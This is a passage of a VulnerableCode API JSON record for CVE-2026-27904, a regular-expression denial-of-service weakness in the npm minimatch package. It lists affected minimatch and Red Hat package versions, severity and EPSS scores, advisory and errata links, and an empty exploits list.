"vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909380?format=api", "purl": "pkg:npm/minimatch@7.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909381?format=api", "purl": "pkg:npm/minimatch@7.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909382?format=api", "purl": "pkg:npm/minimatch@7.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909383?format=api", "purl": "pkg:npm/minimatch@7.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909384?format=api", "purl": "pkg:npm/minimatch@7.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909385?format=api", "purl": "pkg:npm/minimatch@7.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909386?format=api", "purl": "pkg:npm/minimatch@7.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909387?format=api", "purl": "pkg:npm/minimatch@7.4.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909388?format=api", "purl": "pkg:npm/minimatch@7.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909389?format=api", "purl": "pkg:npm/minimatch@7.4.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/62797?format=api", "purl": "pkg:npm/minimatch@7.4.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/67893?format=api", "purl": "pkg:npm/minimatch@8.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909390?format=api", "purl": "pkg:npm/minimatch@8.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909391?format=api", "purl": "pkg:npm/minimatch@8.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909392?format=api", "purl": "pkg:npm/minimatch@8.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909393?format=api", "purl": "pkg:npm/minimatch@8.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/62796?format=api", "purl": "pkg:npm/minimatch@8.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/67894?format=api", "purl": "pkg:npm/minimatch@9.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909394?format=api", "purl": "pkg:npm/minimatch@9.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909395?format=api", "purl": "pkg:npm/minimatch@9.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909396?format=api", "purl": "pkg:npm/minimatch@9.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909397?format=api", "purl": "pkg:npm/minimatch@9.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909398?format=api", "purl": "pkg:npm/minimatch@9.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/62794?format=api", "purl": "pkg:npm/minimatch@9.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/67895?format=api", "purl": "pkg:npm/minimatch@10.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909399?format=api", "purl": "pkg:npm/minimatch@10.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909400?format=api", "purl": "pkg:npm/minimatch@10.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909401?format=api", "purl": "pkg:npm/minimatch@10.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909402?format=api", "purl": "pkg:npm/minimatch@10.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909403?format=api", "purl": "pkg:npm/minimatch@10.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909404?format=api", "purl": "pkg:npm/minimatch@10.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909405?format=api", "purl": "pkg:npm/minimatch@10.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909406?format=api", "purl": "pkg:npm/minimatch@10.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/62793?format=api", "purl": "pkg:npm/minimatch@10.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/917696?format=api", "purl": "pkg:npm/minimatch@10.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/86929?format=api", "purl": "pkg:rpm/redhat/automation-platform-ui@2.6.7-1?arch=el9ap", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1znw-5dwm-7ydy" }, { "vulnerability": "VCID-d6bq-bvvm-33f4" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-x41s-g5mh-pkdq" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-platform-ui@2.6.7-1%3Farch=el9ap" }, { "url": "http://public2.vulnerablecode.io/api/packages/1060002?format=api", "purl": "pkg:rpm/redhat/nodejs22@1:22.22.2-1?arch=el10_1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-dt7u-3usg-9uet" }, { "vulnerability": "VCID-gv39-q6pw-yfh4" }, { "vulnerability": "VCID-hgd1-7u6j-p7dh" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-n6ew-t7g1-33gn" }, { "vulnerability": "VCID-q4u6-6pbw-5bcq" }, { "vulnerability": "VCID-sy2z-sqgk-d7hg" }, { "vulnerability": "VCID-z7ac-jr58-gkfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/nodejs22@1:22.22.2-1%3Farch=el10_1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1060001?format=api", "purl": "pkg:rpm/redhat/nodejs22@1:22.22.2-2?arch=el10_0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-dt7u-3usg-9uet" }, { "vulnerability": "VCID-gv39-q6pw-yfh4" }, { "vulnerability": "VCID-hgd1-7u6j-p7dh" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-n6ew-t7g1-33gn" }, { "vulnerability": "VCID-q4u6-6pbw-5bcq" }, { "vulnerability": "VCID-sy2z-sqgk-d7hg" }, { "vulnerability": "VCID-z7ac-jr58-gkfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/nodejs22@1:22.22.2-2%3Farch=el10_0" } ], "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27904.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27904.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27904", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04722", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04695", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04755", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04707", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06755", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06764", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06822", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06879", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06829", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06835", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06831", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06906", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06884", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.06899", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07439", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07214", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07369", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0744", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07424", "published_at": "2026-05-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27904" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/minimatch", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/minimatch" }, { "reference_url": "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce" }, { "reference_url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T19:21:18Z/" } ], "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129095", "reference_id": "1129095", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129095" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "reference_id": "2442922", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922" }, { "reference_url": "https://github.com/advisories/GHSA-23c5-xmqv-rm74", "reference_id": "GHSA-23c5-xmqv-rm74", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-23c5-xmqv-rm74" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:10184", "reference_id": "RHSA-2026:10184", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:10184" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:13826", "reference_id": "RHSA-2026:13826", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:13826" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4942", "reference_id": "RHSA-2026:4942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5168", "reference_id": "RHSA-2026:5168", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5168" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5665", "reference_id": "RHSA-2026:5665", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5665" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6277", "reference_id": "RHSA-2026:6277", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6277" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6497", "reference_id": "RHSA-2026:6497", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6497" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6567", "reference_id": "RHSA-2026:6567", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6567" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6568", "reference_id": "RHSA-2026:6568", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6568" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7080", "reference_id": "RHSA-2026:7080", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7080" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7123", "reference_id": "RHSA-2026:7123", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7123" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7302", "reference_id": "RHSA-2026:7302", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7302" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7310", "reference_id": "RHSA-2026:7310", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7310" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7896", "reference_id": "RHSA-2026:7896", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7896" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7983", "reference_id": "RHSA-2026:7983", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7983" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:8339", "reference_id": "RHSA-2026:8339", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:8339" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:9711", "reference_id": "RHSA-2026:9711", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:9711" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:9742", "reference_id": "RHSA-2026:9742", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:9742" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:9874", "reference_id": "RHSA-2026:9874", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:9874" } ], "weaknesses": [ { "cwe_id": 1333, "name": "Inefficient Regular Expression Complexity", "description": "The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "6.5 - 8.9", "exploitability": "0.5", "weighted_severity": "8.0", "risk_score": 4.0, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kq3k-xr3z-z3c4" }